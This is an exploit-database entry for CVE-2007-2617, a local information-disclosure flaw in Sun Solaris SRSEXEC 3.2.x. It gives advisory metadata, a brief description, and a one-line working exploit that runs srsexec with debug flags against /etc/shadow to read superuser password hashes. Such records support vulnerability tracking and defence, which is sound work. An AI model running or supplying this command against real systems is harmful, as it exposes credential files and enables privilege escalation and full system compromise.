Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure
Author: anonymous
type: local
platform: solaris
port:
date_added: 2007-05-10
date_updated: 2013-12-04
verified: 1
codes: CVE-2007-2617;OSVDB-35940
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/23915/info
Sun Microsystems Solaris is prone to a local information-disclosure vulnerability due to a design error.
A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible.
The following exploit example is available:
$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED